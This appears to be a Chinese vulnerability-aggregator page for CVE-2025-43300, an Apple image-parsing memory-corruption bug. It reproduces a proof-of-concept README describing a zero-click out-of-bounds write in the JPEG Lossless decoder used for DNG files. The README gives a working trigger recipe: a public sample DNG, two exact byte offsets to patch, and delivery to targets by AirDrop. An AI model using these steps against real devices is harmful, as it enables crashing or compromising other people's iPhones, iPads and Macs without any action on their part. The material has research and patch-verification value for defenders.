关联漏洞
标题:
Apple多款产品 安全漏洞
(CVE-2025-43300)
描述:Apple iOS等都是美国苹果(Apple)公司的产品。Apple iOS是一套为移动设备所开发的操作系统。Apple macOS是一套专为Mac计算机所开发的专用操作系统。Apple iPadOS是一套用于iPad平板电脑的操作系统。 Apple多款产品存在安全漏洞,该漏洞源于处理恶意图像文件可能导致内存损坏。以下产品及版本受到影响:macOS Sonoma 14.7.8版本、macOS Ventura 13.7.8版本、iPadOS 17.7.10版本、macOS Sequoia 15.6.1版本、
描述
iOS 18.6.1 0-click RCE POC
介绍
# iOS 18.6.1 0-click RCE POC
The vulnerability seems to be in the Apple's implementation of JPEG Lossless Decompression code which is used inside Adobe's DNG file format. I modified `SamplePerPixel` of the `SubIFD` directory of a DNG to reach the vulnerable function and decreased the `component` count of the `SOF3` block to trigger what seems like an oob write.
`RawCamera.bundle` where all of the vulnerable code lies seems to stripped off symbols so it's hard to explain the code path but I leave that for the reader to figure out. Not all DNG files that have JPEG Lossless compression seems to be reaching this vulnerable path, I used Adobe's offical `Adobe DNG Converter` tool and also `dnglab` to export DNG files with this compression type but never reached this code path until this very specific sample DNG I linked below. This POC doesn't crash iOS 18.6.2 so I assume it's the same bug :P
## Reproduction steps:
1. Download https://www.dpreview.com/sample-galleries/4949897610/pentax-k-3-mark-iii-sample-gallery/1638788346
2. Modify the following bytes:
```
0x2FD00: 01 -> 02
0x3E40B: 02 -> 01
```
3. Airdrop etc
文件快照
[4.0K] /data/pocs/61e24c6d37c1a8eed22114bd880860a388427b47
└── [1.1K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。